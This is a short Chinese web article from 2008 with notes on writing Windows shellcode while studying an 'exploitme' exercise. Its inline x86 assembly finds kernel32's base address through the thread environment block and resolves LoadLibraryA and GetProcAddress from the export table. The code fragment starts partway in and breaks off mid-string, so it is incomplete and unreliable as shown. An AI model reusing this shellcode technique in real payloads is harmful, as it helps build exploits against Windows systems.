首页 > 新闻系统 > 编程天地 > 文章正文

shellcode之小小琢磨

2008-04-16 10:06:06 来源:中国自学编程网 作者:佚名 点击:
本文没有什么东西,只是我在研究exploitme时候的一点心得。文章内容其实很少,所以冠名“小小琢磨”。

  je  Found  
    inc edx  
    add ebx,4
    mov eax,ebx
    pop ecx
    loop FindLoop    
Found:
    add esp,4
    mov eax,esi
    mov eax,[eax+0x1c]    
    add eax,ImageBase    
    shl edx,2
    add eax,edx
    mov eax,[eax]      
    add eax,ImageBase
    jmp Founded
    xor eax,eax
Founded:
    ret
  }
  
  __asm
  {
Start:
    push esi
    push ecx
    
    xor eax, eax        
    xor esi, esi
    mov esi, fs:[esi + 0x18]     
    mov eax, [esi+4]                       
    mov eax, [eax - 0x1c]        
find_kernel32_base:
    dec eax                      
    xor ax, ax
    cmp word ptr [eax], 0x5a4d   
    jne find_kernel32_base       
    
    pop ecx
    pop esi
    mov uKernelBase,eax
    mov ImageBase,eax
    mov flen,0x0c
    call LL1
    _emit ’L’   
    _emit ’o’
    _emit ’a’
    _emit ’d’
    _emit ’L’
    _emit ’i’
    _emit ’b’
    _emit ’r’
    _emit ’a’
    _emit ’r’
    _emit ’y’
    _emit ’A’
    _emit 0
LL1:
    pop eax
    mov FuncName,eax
    call GetFunc
    mov uLoadLibrary,eax
    
    mov flen,0x0E
    call LL2
    _emit ’G’   
    _emit ’e’
    _emit ’t’
    _emit ’P’
    _emit ’r’
    _emit ’o’
    _emit ’c’
    _emit ’A’
    _emit ’d’
    _emit ’d’
9 7 3 1 2 3 4 5 6 4 8 :

相关文章:

    无相关新闻
    无相关新闻
编辑部信箱 去论坛给我们提意见

精彩推荐
焦点大图推荐
本类热门文章

论坛美图

广告联系 | 版权说明 | 意见建议 | 加入收藏 | 军网站群 [ 军软件园 - 军软件商城 - 军软件园论坛 ]

电信与信息服务业务经营许可证:京ICP证050203